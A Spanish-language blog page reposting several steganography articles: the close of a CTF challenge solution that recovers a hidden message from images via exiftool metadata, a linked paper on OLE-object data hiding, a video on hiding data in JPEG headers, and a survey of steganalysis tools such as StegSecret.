Tenéis mayor detalle y el código en los artículos de CodeProject. Para extraer el MENSAJE SECRETO tendremos que leer cada byte del stream de la CLAVE, calcular la posición del siguiente pixel, obtener el color e ir escribiendo el valor de R, G o B en el stream del MENSAJE SECRETO. Pero, ¿donde puedo conseguir la CLAVE (fichero clave y contraseña) para extraerlo?


                                              

Si habéis analizado las imágenes con otras herramientas, seguro que os habréis dado cuenta que la de la oveja negra es particularmente especial. 

Tiene un chunk diferente que podremos analizar por ejemplo con Tweakpng o, más fácil aún, si observamos los metadatos obtendremos lo que buscamos rápidamente:

C:\Users\vmotos\Desktop\Reto15>"exiftool(-k).exe" -l oveja5 
... 
Document Name       
hax0r5
Software       
https://sites.google.com/site/h4ckpl4y3s/key15.txt 
 ...  

Donde la URL en 'Software' contiene la ruta hacia la clave y el 'Document Name' indica la contraseña (hax0r5) (ojo también a las coodernadas GPS ;) ).  

Ya tenemos todo, la clave, la contraseña y las imágenes para obtener el mensaje secreto, así que podemos compilar el código o usar el binario que nos regala el autor de la herramienta:
 
 
Y finalmente se obtiene la respuesta: "vivire contra". 

Eso es todo, espero que os haya gustado el reto. Muchas gracias a todos los que hayáis intentado resolverlo y enhorabuena al ganador Daniel Correa, ya un asiduo de nuestra sección que nos recomienda también echar un vistazo a OpenPuff que soporta múltiples portadores, formatos y configuraciones.

¡Hasta la próxima!

Fuente:http://www.hackplayers.com/2012/07/solucion-al-reto-15-de-las-ovejas.html

Objetos OLE

0 comentarios
Ya existe una entrada relacionada con el tema pero en esta explicare que son y como pueden realizar este "ataque" manualmente.

Este documento lo escribi para wow.sinfocol.org como ayuda educativa para el wargame asi que les recomiendo que se den la pasadita y se entretengan un rato.

---------------------------------------------------------------------------------------------------

Basicamente doy una introduccion de que son los objetos OLE y como trabajarlos, en este caso doy un ejemplo practico con el programa mergestreams.
Tambien busco dar una vision de como detectar esta tecnica y como estamos actualmente frente a una situacion de fuga de informacion.

Aqui dejo el link http://www.mediafire.com/?mmjm1i4xjoj de descarga

Formato PDF

Mirror:

http://www.phyrexianarena.com/wow/viewtopic.php?f=87&t=78

saludos roboticos

Analizando JPEG

0 comentarios
Bueno este es un gran aporte por parte de sinfocol.org, ningun aporte de ellos se puede desperdiciar por eso les traigo este parte de todo el trabajo que llevan, los admiro y sigan asi muchachos :D.
En el video se realiza un analisis de la estructura del jpeg, logrando el objetivo de ingresar cualquier dato sin modificar algun pixel de la imagen entre los limites de sus cabeceras de formato.

Video:

http://www.youtube.com/watch?v=LlHhUk9YLg0&eurl

FUENTE:http://www.sinfocol.org/2008/08/analizando-jpeg/

Herramientas para análisis esteganográfico

0 comentarios
Hola,

Confieso que cuando selecciono herramientas esteganográficas, suelo hacerlo para plataformas Linux y otros derivados de UNIX. No conozco mucho cómo está el mercado en herramientas Windows, ya que cuando me pongo a mirar las opciones que hay, casi todas son de pago, y empleando código privado. Las gratuítas brillan por su ausencia, y en general son incompletas o demasiado elementales.

Herramientas para el análisis esteganográfico hay muchas. Algunos ejemplos podrían ser, sin distinguir entre herramientas comerciales y gratuítas, o específicas por sistema: Stegdetect, Stego Suite, Stegkit, Digital Invisible Ink Toolkit, StegSpy, SteGUI, Stepic, wbStego4, NL Stego, StegFS ... la lista es larga. Este listado podemos complementarlo con StegSecret, un programa multiplataforma desarrollado por Alfonso Muñoz, que yo particularmente no conocía.

stegsecret

StegSecret es una herramienta libre, y como está escrita en Java, es portable y por tanto, perfectamente ejecutable en entornos Windows y en otros derivados de UNIX. Permite las operaciones básicas de análisis esteganográfico, y tal y como comentan en el sitio web, trabajan ya en la implementación de técnicas avanzadas.

El análisis esteganográfico es siempre un reto, ya que cuando se emplean herramientas estándar para la ocultación suele ser fácil revelar la información ocultada en el medio digital. Sin embargo, a poco que nos salgamos de estos métodos, la revelación estegranográfica se complica e incluso imposibilita, según el caso. Las técnicas de ocultación y revelación esteganográficas son cruciales en la investigación del crimen organizado, ya que suelen ser empleadas con frecuencia para transmitir mensajes de una manera poco detectable.

Un saludo, y enhorabuena a Alfonso por su buen trabajo.


Fuente:http://www.sahw.com/wp/archivos/2007/12/23/herramientas-para-analisis-esteganografico/

Powered by Bad Robot
Helped by Blackubay